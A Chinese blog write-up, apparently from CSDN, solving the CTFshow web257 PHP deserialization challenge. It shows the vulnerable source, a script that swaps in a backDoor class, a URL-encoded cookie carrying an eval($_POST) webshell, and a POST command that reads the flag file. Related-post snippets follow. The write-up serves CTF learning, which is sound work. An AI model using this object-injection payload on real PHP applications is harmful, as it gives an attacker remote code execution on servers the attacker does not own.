ctfshow-web257(反序列化)

已于 2022-02-24 17:18:11 修改
阅读量1.9k 收藏 1
点赞数
文章标签: elementui webview vue.js
于 2022-02-23 15:15:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/123090870
版权
本文探讨了PHP中的__destruct()魔术方法在对象销毁时的作用,通常用于资源释放。通过示例展示了如何在ctfShowUser类中利用__destruct()执行backDoor类的getInfo()方法,从而实现代码注入攻击。文章还提到了如何通过构造恶意cookie来触发这一过程,以及如何通过POST参数执行系统命令。
摘要由CSDN通过智能技术生成

__destruct() 是PHP面向对象编程的另一个重要的魔法函数,该函数会在类的一个对象被删除时自动调用。 

我们可以在该函数中添加一些释放资源的操作,比如关闭文件、关闭数据库链接、清空一个结果集等。其实,__destruct() 在日常的编码中并不常见,因为它是非必须的,是类的可选组成部分。通常只是用来完成对象被删除时的清理动作而已。

类中的getinfo()方法通常用于获取一些信息。(java的,php的没找到)

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

加了很多类,逐个分析,ctfShowUser一定要,最后要login,info应该不能要,会为user赋值,就不能用user把需要的代码传入了,这里面没有与flag有关的代码,可能就要读取其中的文件了

backDoor中的code传入一句话木马(把ctfShowUser中的info改成backDoor)

<?php
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new backDoor();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}


class backDoor{
    private $code='eval($_POST[value]);';
    public function getInfo(){
        eval($this->code);
    }
}
/*
class backDoor{
    private $code = 'system("cat ./flag.php");';
}
也可以这样
*/
echo(urlencode(serialize(new ctfShowUser)));
?username=xxxxxx&password=xxxxxx

Cookie:user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A0%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A20%3A%22eval%28%24_POST%5Bvalue%5D%29%3B%22%3B%7D%7D

POST
value=system('tac flag.php');

m0_62094846
关注
CTFshow 反序列化 web257
Kradress的博客
12-19 1946
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 20:33:07 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
ctfshow-web入门(信息收集,持续更新中。。)
最新发布
yuanxu8877的博客
10-04 992
本文为ctfshow-web入门题目wp
【CTF-WEB基础】ctfshow-web入门-257反序列化
yu_fly_fish的博客
08-14 135
一起加油!
ctfshow web入门反序列化 web254-257
m0_62207170的博客
04-21 614
ctfshow web入门反序列化 web254-257
ctfshow web255 web 256 web257
姜小孩的博客
07-02 1501
目录web255web256附代码 整体的思路和上一题差不多只是多了一句 可以看到unserialize就是反序列化,所以需要我们序列化一些东西,通过cookie的user变量传入,改变这个数据。 这段代码无法让isVip为true,所以我们就需要通过user这个变量改变isVip的值。直接把类拿过来,只有类和变量会被反序列化,其他都可以去掉。 所以参入参数就是拿到flag,债见!!附代码 ​ 这个题的关键点在于username和password不相等,因为都是强比较,所以我们传入
[WP/WEB/反序列化/未完]CTFshow-web257-268
車鈊的博客
10-12 1035
Web257 <?php class ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->class=new backDoor(); } public function
ctfshow web入门 反序列化(254~257详解)
WRplayeR的博客
04-12 485
php反序列化的简单学习
ctfshow-web255(反序列化)
m0_62094846的博客
02-23 777
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__.
CTFshow反序列化-web271-278
qq_52579508的博客
08-31 1321
Laravel框架反序列化提交的入口找到一个链子成功执行查看flag。
ctfshow-web入门-反序列化(前篇)
ccfly1012的博客
10-24 6151
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
ctfshow web 反序列化(web254-278)
qq_50589021的博客
09-04 7570
知识储备 随笔分类 - PHP常识 PHP中的魔术变量: __sleep() //执行serialize()时,先会调用这个函数 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过) __construct() //当对象被创建时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中
CTFshow_反序列化_web276
ScyLamb的博客
04-28 851
web276 phar反序列化 对phar的利用当时学的时候是半知半解,导致写这题花了好久,又无wp,最后然后尝试用单步调试解决了 <?php highlight_file(__FILE__); class filter{ public $filename; public $filecontent; public $evilfile=false; public $admin = false; public function __construct($f,$f
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1600
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 3052
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
CTFshow-WEB入门-反序列化
feng的博客
02-14 5654
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
ctfshow-反序列化
m0_72898152的博客
02-17 914
ctfshow、反序列化
CTFshow反序列化-web254-270
qq_52579508的博客
08-31 1799
看着代码挺多 一步步看首先定位怎么拿flag主要是是这段如果username和u相等,password和p 相等执行下一句 赋值 ,然后 返回 isvip等于true我们直接让isvip 等于true ,然后输入username的时候等于 源代码里面的值其实就是个判断都还没开始上序列化。
CTFShow-web入门-学习笔记-信息收集
m0_66713779的博客
10-04 162
当用vi编辑文件时,vi会生成一个交换文件,如果这个文件可以被访问到,那么就可以依据这个文件恢复出被编辑文件的内容,会出现如下文件:index.php.swp、index.php.swo、index.php.swn。这回无论是查看源代码,还是抓包,还是dirsearch,都挖不出个鬼来,那就想办法挖出该网站的phps源文件。.phps是PHP的源代码文件,查看index.phps,成功下载网站的源代码。这题有点奇怪,源代码,抓包,目录扫描什么都没有,想到是备份文件泄漏。
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 1892
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值